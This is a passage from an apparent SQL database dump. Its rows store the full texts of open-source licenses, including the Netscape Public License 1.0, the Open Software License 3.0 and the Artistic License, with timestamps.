Collective\nWork, the Licensor offers to the recipient a license to the Work on the same\nterms and conditions as the license granted to You under this License.\n\nb. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nc. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\nd. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, neither party will use the trademark \"Creative Commons\"\nor any related trademark or logo of Creative Commons without the prior written\nconsent of Creative Commons. Any permitted use will be in compliance with\nCreative Commons\' then-current trademark usage guidelines, as may be published\non its website or otherwise made available upon request from time to time.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(120,'NPL-1.0','NETSCAPE PUBLIC LICENSE\n\nVersion 1.0\n\n 1. Definitions.\n\n1.1. ``Contributor\'\' means each entity that creates or contributes to the\ncreation of Modifications.\n\n1.2. ``Contributor Version\'\' means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. ``Covered Code\'\' means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4. ``Electronic Distribution Mechanism\'\' means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n1.5. ``Executable\'\' means Covered Code in any form other than Source Code.\n\n1.6. ``Initial Developer\'\' means the individual or entity identified as the\nInitial Developer in the Source Code notice required byExhibit A.\n\n1.7. ``Larger Work\'\' means a work which combines Covered Code or portions\nthereof with code not governed by the terms of this License.\n\n 1.8. ``License\'\' means this document.\n\n1.9. ``Modifications\'\' means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10. ``Original Code\'\' means Source Code of computer software code which\nis described in the Source Code notice required byExhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.11. ``Source Code\'\' means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or a list of source code differential comparisons against\neither the Original Code or another well known, available Covered Code of\nthe Contributor\'s choice. The Source Code can be in a compressed or archival\nform, provided the appropriate decompression or de-archiving software is widely\navailable for no charge.\n\n1.12. ``You\'\' means an individual or a legal entity exercising rights under,\nand complying with all of the terms of, this License or a future version of\nthis License issued under Section 6.1. For legal entities, ``You\'\' includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, ``control\'\' means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of fifty percent (50%) or more\nof the outstanding shares or beneficial ownership of such entity.\n\n 2. Source Code License.\n\n2.1. The Initial Developer Grant. The Initial Developer hereby grants You\na world-wide, royalty-free, non-exclusive license, subject to third party\nintellectual property claims:\n\na) to use, reproduce, modify, display, perform, sublicense and distribute\nthe Original Code (or portions thereof) with or without Modifications, or\nas part of a Larger Work; and\n\n(b) under patents now or hereafter owned or controlled by Initial Developer,\nto make, have made, use and sell (``Utilize\'\') the Original Code (or portions\nthereof), but solely to the extent that any such patent is reasonably necessary\nto enable You to Utilize the Original Code (or portions thereof) and not to\nany greater extent that may be necessary to Utilize further Modifications\nor combinations.\n\n \n\n 2.2. Contributor Grant.\n\nEach Contributor hereby grants You a world-wide, royalty-free, non-exclusive\nlicense, subject to third party intellectual property claims:\n\n(a) to use, reproduce, modify, display, perform, sublicense and distribute\nthe Modifications created by such Contributor (or portions thereof) either\non an unmodified basis, with other Modifications, as Covered Code or as part\nof a Larger Work; and\n\n(b) under patents now or hereafter owned or controlled by Contributor, to\nUtilize the Contributor Version (or portions thereof), but solely to the extent\nthat any such patent is reasonably necessary to enable You to Utilize the\nContributor Version (or portions thereof), and not to any greater extent that\nmay be necessary to Utilize further Modifications or combinations.\n\n 3. Distribution Obligations.\n\n3.1. Application of License. The Modifications which You create or to which\nYou contribute are governed by the terms of this License, including without\nlimitation Section 2.2. The Source Code version of Covered Code may be distributed\nonly under the terms of this License or a future version of this License released\nunder Section 6.1, and You must include a copy of this License with every\ncopy of the Source Code You distribute. You may not offer or impose any terms\non any Source Code version that alters or restricts the applicable version\nof this License or the recipients\' rights hereunder. However, You may include\nan additional document offering the additional rights described in Section\n3.5.\n\n3.2. Availability of Source Code. Any Modification which You create or to\nwhich You contribute must be made available in Source Code form under the\nterms of this License either on the same media as an Executable version or\nvia an accepted Electronic Distribution Mechanism to anyone to whom you made\nan Executable version available; and if made available via Electronic Distribution\nMechanism, must remain available for at least twelve (12) months after the\ndate it initially became available, or at least six (6) months after a subsequent\nversion of that particular Modification has been made available to such recipients.\nYou are responsible for ensuring that the Source Code version remains available\neven if the Electronic Distribution Mechanism is maintained by a third party.\n\n3.3. Description of Modifications. You must cause all Covered Code to which\nyou contribute to contain a file documenting the changes You made to create\nthat Covered Code and the date of any change. You must include a prominent\nstatement that the Modification is derived, directly or indirectly, from Original\nCode provided by the Initial Developer and including the name of the Initial\nDeveloper in (a) the Source Code, and (b) in any notice in an Executable version\nor related documentation in which You describe the origin or ownership of\nthe Covered Code.\n\n 3.4. Intellectual Property Matters\n\n(a) Third Party Claims. If You have knowledge that a party claims an intellectual\nproperty right in particular functionality or code (or its utilization under\nthis License), you must include a text file with the source code distribution\ntitled ``LEGAL\'\' which describes the claim and the party making the claim\nin sufficient detail that a recipient will know whom to contact. If you obtain\nsuch knowledge after You make Your Modification available as described in\nSection 3.2, You shall promptly modify the LEGAL file in all copies You make\navailable thereafter and shall take other steps (such as notifying appropriate\nmailing lists or newsgroups) reasonably calculated to inform those who received\nthe Covered Code that new knowledge has been obtained.\n\n(b) Contributor APIs. If Your Modification is an application programming interface\nand You own or control patents which are reasonably necessary to implement\nthat API, you must also include this information in the LEGAL file.\n\n3.5. Required Notices. You must duplicate the notice in Exhibit A in each\nfile of the Source Code, and this License in any documentation for the Source\nCode, where You describe recipients\' rights relating to Covered Code. If You\ncreated one or more Modification(s), You may add your name as a Contributor\nto the notice described in Exhibit A. If it is not possible to put such notice\nin a particular Source Code file due to its structure, then you must include\nsuch notice in a location (such as a relevant directory file) where a user\nwould be likely to look for such a notice. You may choose to offer, and to\ncharge a fee for, warranty, support, indemnity or liability obligations to\none or more recipients of Covered Code. However, You may do so only on Your\nown behalf, and not on behalf of the Initial Developer or any Contributor.\nYou must make it absolutely clear than any such warranty, support, indemnity\nor liability obligation is offered by You alone, and You hereby agree to indemnify\nthe Initial Developer and every Contributor for any liability incurred by\nthe Initial Developer or such Contributor as a result of warranty, support,\nindemnity or liability terms You offer.\n\n3.6. Distribution of Executable Versions. You may distribute Covered Code\nin Executable form only if the requirements of Section 3.1-3.5 have been met\nfor that Covered Code, and if You include a notice stating that the Source\nCode version of the Covered Code is available under the terms of this License,\nincluding a description of how and where You have fulfilled the obligations\nof Section 3.2. The notice must be conspicuously included in any notice in\nan Executable version, related documentation or collateral in which You describe\nrecipients\' rights relating to the Covered Code. You may distribute the Executable\nversion of Covered Code under a license of Your choice, which may contain\nterms different from this License, provided that You are in compliance with\nthe terms of this License and that the license for the Executable version\ndoes not attempt to limit or alter the recipient\'s rights in the Source Code\nversion from the rights set forth in this License. If You distribute the Executable\nversion under a different license You must make it absolutely clear that any\nterms which differ from this License are offered by You alone, not by the\nInitial Developer or any Contributor. You hereby agree to indemnify the Initial\nDeveloper and every Contributor for any liability incurred by the Initial\nDeveloper or such Contributor as a result of any such terms You offer.\n\n3.7. Larger Works. You may create a Larger Work by combining Covered Code\nwith other code not governed by the terms of this License and distribute the\nLarger Work as a single product. In such a case, You must make sure the requirements\nof this License are fulfilled for the Covered Code.\n\n 4. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute or regulation\nthen You must: (a) comply with the terms of this License to the maximum extent\npossible; and (b) describe the limitations and the code they affect. Such\ndescription must be included in the LEGAL file described in Section 3.4 and\nmust be included with all distributions of the Source Code. Except to the\nextent prohibited by statute or regulation, such description must be sufficiently\ndetailed for a recipient of ordinary skill to be able to understand it.\n\n 5. Application of this License.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A, and to related Covered Code.\n\n 6. Versions of the License.\n\n6.1. New Versions. Netscape Communications Corporation (``Netscape\'\') may\npublish revised and/or new versions of the License from time to time. Each\nversion will be given a distinguishing version number.\n\n6.2. Effect of New Versions. Once Covered Code has been published under a\nparticular version of the License, You may always continue to use it under\nthe terms of that version. You may also choose to use such Covered Code under\nthe terms of any subsequent version of the License published by Netscape.\nNo one other than Netscape has the right to modify the terms applicable to\nCovered Code created under this License.\n\n6.3. Derivative Works. If you create or use a modified version of this License\n(which you may only do in order to apply it to code which is not already Covered\nCode governed by this License), you must (a) rename Your license so that the\nphrases ``Mozilla\'\', ``MOZILLAPL\'\', ``MOZPL\'\', ``Netscape\'\', ``NPL\'\' or any\nconfusingly similar phrase do not appear anywhere in your license and (b)\notherwise make it clear that your version of the license contains terms which\ndiffer from the Mozilla Public License and Netscape Public License. (Filling\nin the name of the Initial Developer, Original Code or Contributor in the\nnotice described in Exhibit A shall not of themselves be deemed to be modifications\nof this License.)\n\n 7. DISCLAIMER OF WARRANTY.\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN ``AS IS\'\' BASIS, WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES THAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR\nA PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY\nAND PERFORMANCE OF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE\nDEFECTIVE IN ANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR)\nASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. TERMINATION.\n\nThis License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n 9. LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL THE INITIAL DEVELOPER, ANY OTHER\nCONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY SUPPLIER OF ANY OF\nSUCH PARTIES, BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL,\nINCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION,\nDAMAGES FOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION,\nOR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL\nHAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF\nLIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING\nFROM SUCH PARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THAT EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10. U.S. GOVERNMENT END USERS.\n\nThe Covered Code is a ``commercial item,\'\' as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of ``commercial computer software\'\' and ``commercial\ncomputer software documentation,\'\' as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Covered Code\nwith only those rights set forth herein.\n\n 11. MISCELLANEOUS.\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by California law provisions (except to the extent\napplicable law, if any, provides otherwise), excluding its conflict-of-law\nprovisions. With respect to disputes in which at least one party is a citizen\nof, or an entity chartered or registered to do business in, the United States\nof America: (a) unless otherwise agreed in writing, all disputes relating\nto this License (excepting any dispute relating to intellectual property rights)\nshall be subject to final and binding arbitration, with the losing party paying\nall costs of arbitration; (b) any arbitration relating to this Agreement shall\nbe held in Santa Clara County, California, under the auspices of JAMS/EndDispute;\nand (c) any litigation relating to this Agreement shall be subject to the\njurisdiction of the Federal Courts of the Northern District of California,\nwith venue lying in Santa Clara County, California, with the losing party\nresponsible for costs, including without limitation, court costs and reasonable\nattorneys fees and expenses. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License.\n\n 12. RESPONSIBILITY FOR CLAIMS.\n\nExcept in cases where another Contributor has failed to comply with Section\n3.4, You are responsible for damages arising, directly or indirectly, out\nof Your utilization of rights under this License, based on the number of copies\nof Covered Code you made available, the revenues you received from utilizing\nsuch rights, and other relevant factors. You agree to work with affected parties\nto distribute responsibility on an equitable basis.\n\nAMENDMENTS\n\nAdditional Terms applicable to the Netscape Public License.\n\n I. Effect.\n\nThese additional terms described in this Netscape Public License -- Amendments\nshall apply to the Mozilla Communicator client code and to all Covered Code\nunder this License.\n\nII. ``Netscape\'s Branded Code\'\' means Covered Code that Netscape distributes\nand/or permits others to distribute under one or more trademark(s) which are\ncontrolled by Netscape but which are not licensed for use under this License.\n\n III. Netscape and logo.\n\nThis License does not grant any rights to use the trademark ``Netscape\'\',\nthe ``Netscape N and horizon\'\' logo or the Netscape lighthouse logo, even\nif such marks are included in the Original Code.\n\n IV. Inability to Comply Due to Contractual Obligation.\n\nPrior to licensing the Original Code under this License, Netscape has licensed\nthird party code for use in Netscape\'s Branded Code. To the extent that Netscape\nis limited contractually from making such third party code available under\nthis License, Netscape may choose to reintegrate such code into Covered Code\nwithout being required to distribute such code in Source Code form, even if\nsuch code would otherwise be considered ``Modifications\'\' under this License.\n\n V. Use of Modifications and Covered Code by Initial Developer.\n\nV.1. In General. The obligations of Section 3 apply to Netscape, except to\nthe extent specified in this Amendment, Section V.2 and V.3.\n\nV.2. Other Products. Netscape may include Covered Code in products other than\nthe Netscape\'s Branded Code which are released by Netscape during the two\n(2) years following the release date of the Original Code, without such additional\nproducts becoming subject to the terms of this License, and may license such\nadditional products on different terms from those contained in this License.\nV.3. Alternative Licensing. Netscape may license the Source Code of Netscape\'s\nBranded Code, including Modifications incorporated therein, without such additional\nproducts becoming subject to the terms of this License, and may license such\nadditional products on different terms from those contained in this License.\n\n VI. Arbitration and Litigation.\n\nNotwithstanding the limitations of Section 11 above, the provisions regarding\narbitration and litigation in Section 11(a), (b) and (c) of the License shall\napply to all disputes relating to this License. EXHIBIT A.\n\n\"The contents of this file are subject to the Netscape Public License Version\n1.0 (the \"License\"); you may not use this file except in compliance with the\nLicense. You may obtain a copy of the License at http://www.mozilla.org/NPL/\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Original Code is Mozilla Communicator client code, released March 31, 1998.\n\nThe Initial Developer of the Original Code is Netscape Communications Corporation.\nPortions created by Netscape are Copyright (C) 1998 Netscape Communications\nCorporation. All Rights Reserved.\n\nContributor(s): ______________________________________.\"\n\n[NOTE: The text of this Exhibit A may differ slightly from the text of the\nnotices in the Source Code files of the Original Code. This is due to time\nconstraints encountered in simultaneously finalizing the License and in preparing\nthe Original Code for release. You should use the text of this Exhibit A rather\nthan the text found in the Original Code Source Code for Your Modifications.]\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(121,'OSL-3.0','Open Software License v. 3.0 (OSL-3.0)\n\nThis Open Software License (the \"License\") applies to any original work of\nauthorship (the \"Original Work\") whose owner (the \"Licensor\") has placed the\nfollowing licensing notice adjacent to the copyright notice for the Original\nWork:\n\nLicensed under the Open Software License version 3.0\n\n1) Grant of Copyright License. Licensor grants You a worldwide, royalty-free,\nnon-exclusive, sublicensable license, for the duration of the copyright, to\ndo the following:\n\na) to reproduce the Original Work in copies, either alone or as part of a\ncollective work;\n\nb) to translate, adapt, alter, transform, modify, or arrange the Original\nWork, thereby creating derivative works (\"Derivative Works\") based upon the\nOriginal Work;\n\nc) to distribute or communicate copies of the Original Work and Derivative\nWorks to the public, with the proviso that copies of Original Work or Derivative\nWorks that You distribute or communicate shall be licensed under this Open\nSoftware License;\n\n d) to perform the Original Work publicly; and\n\n e) to display the Original Work publicly.\n\n2) Grant of Patent License. Licensor grants You a worldwide, royalty-free,\nnon-exclusive, sublicensable license, under patent claims owned or controlled\nby the Licensor that are embodied in the Original Work as furnished by the\nLicensor, for the duration of the patents, to make, use, sell, offer for sale,\nhave made, and import the Original Work and Derivative Works.\n\n3) Grant of Source Code License. The term \"Source Code\" means the preferred\nform of the Original Work for making modifications to it and all available\ndocumentation describing how to modify the Original Work. Licensor agrees\nto provide a machine-readable copy of the Source Code of the Original Work\nalong with each copy of the Original Work that Licensor distributes. Licensor\nreserves the right to satisfy this obligation by placing a machine-readable\ncopy of the Source Code in an information repository reasonably calculated\nto permit inexpensive and convenient access by You for as long as Licensor\ncontinues to distribute the Original Work.\n\n4) Exclusions From License Grant. Neither the names of Licensor, nor the names\nof any contributors to the Original Work, nor any of their trademarks or service\nmarks, may be used to endorse or promote products derived from this Original\nWork without express prior permission of the Licensor. Except as expressly\nstated herein, nothing in this License grants any license to Licensor\'s trademarks,\ncopyrights, patents, trade secrets or any other intellectual property. No\npatent license is granted to make, use, sell, offer for sale, have made, or\nimport embodiments of any patent claims other than the licensed claims defined\nin Section 2. No license is granted to the trademarks of Licensor even if\nsuch marks are included in the Original Work. Nothing in this License shall\nbe interpreted to prohibit Licensor from licensing under terms different from\nthis License any Original Work that Licensor otherwise would have a right\nto license.\n\n5) External Deployment. The term \"External Deployment\" means the use, distribution,\nor communication of the Original Work or Derivative Works in any way such\nthat the Original Work or Derivative Works may be used by anyone other than\nYou, whether those works are distributed or communicated to those persons\nor made available as an application intended for use over a network. As an\nexpress condition for the grants of license hereunder, You must treat any\nExternal Deployment by You of the Original Work or a Derivative Work as a\ndistribution under section 1(c).\n\n6) Attribution Rights. You must retain, in the Source Code of any Derivative\nWorks that You create, all copyright, patent, or trademark notices from the\nSource Code of the Original Work, as well as any notices of licensing and\nany descriptive text identified therein as an \"Attribution Notice.\" You must\ncause the Source Code for any Derivative Works that You create to carry a\nprominent Attribution Notice reasonably calculated to inform recipients that\nYou have modified the Original Work.\n\n7) Warranty of Provenance and Disclaimer of Warranty. Licensor warrants that\nthe copyright in and to the Original Work and the patent rights granted herein\nby Licensor are owned by the Licensor or are sublicensed to You under the\nterms of this License with the permission of the contributor(s) of those copyrights\nand patent rights. Except as expressly stated in the immediately preceding\nsentence, the Original Work is provided under this License on an \"AS IS\" BASIS\nand WITHOUT WARRANTY, either express or implied, including, without limitation,\nthe warranties of non-infringement, merchantability or fitness for a particular\npurpose. THE ENTIRE RISK AS TO THE QUALITY OF THE ORIGINAL WORK IS WITH YOU.\nThis DISCLAIMER OF WARRANTY constitutes an essential part of this License.\nNo license to the Original Work is granted by this License except under this\ndisclaimer.\n\n8) Limitation of Liability. Under no circumstances and under no legal theory,\nwhether in tort (including negligence), contract, or otherwise, shall the\nLicensor be liable to anyone for any indirect, special, incidental, or consequential\ndamages of any character arising as a result of this License or the use of\nthe Original Work including, without limitation, damages for loss of goodwill,\nwork stoppage, computer failure or malfunction, or any and all other commercial\ndamages or losses. This limitation of liability shall not apply to the extent\napplicable law prohibits such limitation.\n\n9) Acceptance and Termination. If, at any time, You expressly assented to\nthis License, that assent indicates your clear and irrevocable acceptance\nof this License and all of its terms and conditions. If You distribute or\ncommunicate copies of the Original Work or a Derivative Work, You must make\na reasonable effort under the circumstances to obtain the express assent of\nrecipients to the terms of this License. This License conditions your rights\nto undertake the activities listed in Section 1, including your right to create\nDerivative Works based upon the Original Work, and doing so without honoring\nthese terms and conditions is prohibited by copyright law and international\ntreaty. Nothing in this License is intended to affect copyright exceptions\nand limitations (including \"fair use\" or \"fair dealing\"). This License shall\nterminate immediately and You may no longer exercise any of the rights granted\nto You by this License upon your failure to honor the conditions in Section\n1(c).\n\n10) Termination for Patent Action. This License shall terminate automatically\nand You may no longer exercise any of the rights granted to You by this License\nas of the date You commence an action, including a cross-claim or counterclaim,\nagainst Licensor or any licensee alleging that the Original Work infringes\na patent. This termination provision shall not apply for an action alleging\npatent infringement by combinations of the Original Work with other software\nor hardware.\n\n11) Jurisdiction, Venue and Governing Law. Any action or suit relating to\nthis License may be brought only in the courts of a jurisdiction wherein the\nLicensor resides or in which Licensor conducts its primary business, and under\nthe laws of that jurisdiction excluding its conflict-of-law provisions. The\napplication of the United Nations Convention on Contracts for the International\nSale of Goods is expressly excluded. Any use of the Original Work outside\nthe scope of this License or after its termination shall be subject to the\nrequirements and penalties of copyright or patent law in the appropriate jurisdiction.\nThis section shall survive the termination of this License.\n\n12) Attorneys\' Fees. In any action to enforce the terms of this License or\nseeking damages relating thereto, the prevailing party shall be entitled to\nrecover its costs and expenses, including, without limitation, reasonable\nattorneys\' fees and costs incurred in connection with such action, including\nany appeal of such action. This section shall survive the termination of this\nLicense.\n\n13) Miscellaneous. If any provision of this License is held to be unenforceable,\nsuch provision shall be reformed only to the extent necessary to make it enforceable.\n\n14) Definition of \"You\" in This License. \"You\" throughout this License, whether\nin upper or lower case, means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License. For legal entities,\n\"You\" includes any entity that controls, is controlled by, or is under common\ncontrol with you. For purposes of this definition, \"control\" means (i) the\npower, direct or indirect, to cause the direction or management of such entity,\nwhether by contract or otherwise, or (ii) ownership of fifty percent (50%)\nor more of the outstanding shares, or (iii) beneficial ownership of such entity.\n\n15) Right to Use. You may use the Original Work in all ways not otherwise\nrestricted or conditioned by this License or by law, and Licensor promises\nnot to interfere with or be responsible for such uses by You.\n\n16) Modification of This License. This License is Copyright (c) 2005 Lawrence\nRosen. Permission is granted to copy, distribute, or communicate this License\nwithout modification. Nothing in this License permits You to modify this License\nas applied to the Original Work or to Derivative Works. However, You may modify\nthe text of this License and copy, distribute or communicate your modified\nversion (the \"Modified License\") and apply it to other original works of authorship\nsubject to the following conditions: (i) You may not indicate in any way that\nyour Modified License is the \"Open Software License\" or \"OSL\" and you may\nnot use those names in the name of your Modified License; (ii) You must replace\nthe notice specified in the first paragraph above with the notice \"Licensed\nunder <insert your license name here>\" or with a notice of your own that is\nnot confusingly similar to the notice in this License; and (iii) You may not\nclaim that your original works are open source software unless your Modified\nLicense has been approved by Open Source Initiative (OSI) and You comply with\nits license review and certification process.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(122,'Artistic-1.0-cl8','The Artistic License\n\nPreamble\n\nThe intent of this document is to state the conditions under which a Package\nmay be copied, such that the Copyright Holder maintains some semblance of\nartistic control over the development of the package, while giving the users\nof the package the right to use and distribute the Package in a more-or-less\ncustomary fashion, plus the right to make reasonable modifications.\n\nDefinitions:\n\n\"Package\" refers to the collection of files distributed by the Copyright Holder,\nand derivatives of that collection of files created through textual modification.\n\n\"Standard Version\" refers to such a Package if it has not been modified, or\nhas been modified in accordance with the wishes of the Copyright Holder.\n\n\"Copyright Holder\" is whoever is named in the copyright or copyrights for\nthe package.\n\n\"You\" is you, if you\'re thinking about copying or distributing this Package.\n\n\"Reasonable copying fee\" is whatever you can justify on the basis of media\ncost, duplication charges, time of people involved, and so on. (You will not\nbe required to justify it to the Copyright Holder, but only to the computing\ncommunity at large as a market that must bear the fee.)\n\n\"Freely Available\" means that no fee is charged for the item itself, though\nthere may be fees involved in handling the item. It also means that recipients\nof the item may redistribute it under the same conditions they received it.\n\n1. You may make and give away verbatim copies of the source form of the Standard\nVersion of this Package without restriction, provided that you duplicate all\nof the original copyright notices and associated disclaimers.\n\n2. You may apply bug fixes, portability fixes and other modifications derived\nfrom the Public Domain or from the Copyright Holder. A Package modified in\nsuch a way shall still be considered the Standard Version.\n\n3. You may otherwise modify your copy of this Package in any way, provided\nthat you insert a prominent notice in each changed file stating how and when\nyou changed that file, and provided that you do at least ONE of the following:\n\na) place your modifications in the Public Domain or otherwise make them Freely\nAvailable, such as by posting said modifications to Usenet or an equivalent\nmedium, or placing the modifications on a major archive site such as ftp.uu.net,\nor by allowing the Copyright Holder to include your modifications in the Standard\nVersion of the Package.\n\n b) use the modified Package only within your corporation or organization.\n\nc) rename any non-standard executables so the names do not conflict with standard\nexecutables, which must also be provided, and provide a separate manual page\nfor each non-standard executable that clearly documents how it differs from\nthe Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n4. You may distribute the programs of this Package in object code or executable\nform, provided that you do at least ONE of the following:\n\na) distribute a Standard Version of the executables and library files, together\nwith instructions (in the manual page or equivalent) on where to get the Standard\nVersion.\n\nb) accompany the distribution with the machine-readable source of the Package\nwith your modifications.\n\nc) accompany any non-standard executables with their corresponding Standard\nVersion executables, giving the non-standard executables non-standard names,\nand clearly documenting the differences in manual pages (or equivalent), together\nwith instructions on where to get the Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n5. You may charge a reasonable copying fee for any distribution of this Package.\nYou may charge any fee you choose for support of this Package. You may not\ncharge a fee for this Package itself. However, you may distribute this Package\nin aggregate with other (possibly commercial) programs as part of a larger\n(possibly commercial) software distribution provided that you do not advertise\nthis Package as a product of your own.\n\n6. The scripts and library files supplied as input to or produced as output\nfrom the programs of this Package do not automatically fall under the copyright\nof this Package, but belong to whomever generated them, and may be sold commercially,\nand may be aggregated with this Package.\n\n7. C or perl subroutines supplied by you and linked into this Package shall\nnot be considered part of this Package.\n\n8.Aggregation of this Package with a commercial distribution is always permitted\nprovided that the use of this Package is embedded; that is, when no overt\nattempt is made to make this Package\'s interfaces visible to the end user\nof the commercial distribution. Such use shall not be construed as a distribution\nof this Package.\n\n9. The name of the Copyright Holder may not be used to endorse or promote\nproducts derived from this software without specific prior written permission.\n\n10. THIS PACKAGE IS PROVIDED \"AS IS\" AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES,\nINCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTIBILITY AND\nFITNESS FOR A PARTICULAR PURPOSE. The End\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(123,'SGI-B-1.0','SGI FREE SOFTWARE LICENSE B\n\n(Version 1.0 1/25/2000)\n\n 1. Definitions.\n\n1.1 \"Additional Notice Provisions\" means such additional provisions as appear\nin the Notice in Original Code under the heading \"Additional Notice Provisions.\"\n\n1.2 \"API\" means an application programming interface established by SGI in\nconjunction with the Original Code.\n\n1.3 \"Covered Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4 \"Hardware\" means any physical device that accepts input, processes input,\nstores the results of processing, and/or provides output.\n\n1.5 \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n1.6 \"Licensable\" means having the right to grant, to the maximum extent possible,\nwhether at the time of the initial grant or subsequently acquired, any and\nall of the rights conveyed herein.\n\n 1.7 \"License\" means this document.\n\n1.8 \"Modifications\" means any addition to the substance or structure of the\nOriginal Code and/or any addition to or deletion from previous Modifications.\nWhen Covered Code is released as a series of files, a Modification is:\n\nA. Any addition to the contents of a file containing Original Code and/or\nany addition to or deletion from previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.9 \"Notice\" means any notice in Original Code or Covered Code, as required\nby and in compliance with this License.\n\n1.10 \"Original Code\" means source code of computer software code which is\ndescribed in the source code Notice required by Exhibit A as Original Code,\nand updates and error corrections specifically thereto.\n\n1.11 \"Recipient\" means an individual or a legal entity exercising rights under,\nand complying with all of the terms of, this License or a future version of\nthis License issued under Section 8. For legal entities, \"Recipient\" includes\nany entity which controls, is controlled by, or is under common control with\nRecipient. For purposes of this definition, \"control\" of an entity means (a)\nthe power, direct or indirect, to direct or manage such entity, or (b) ownership\nof fifty percent (50%) or more of the outstanding shares or beneficial ownership\nof such entity.\n\n 1.12 SGI\" means Silicon Graphics, Inc.\n\n 2. License Grant and Restrictions.\n\n2.1 License Grant. Subject to the provisions of this License and any 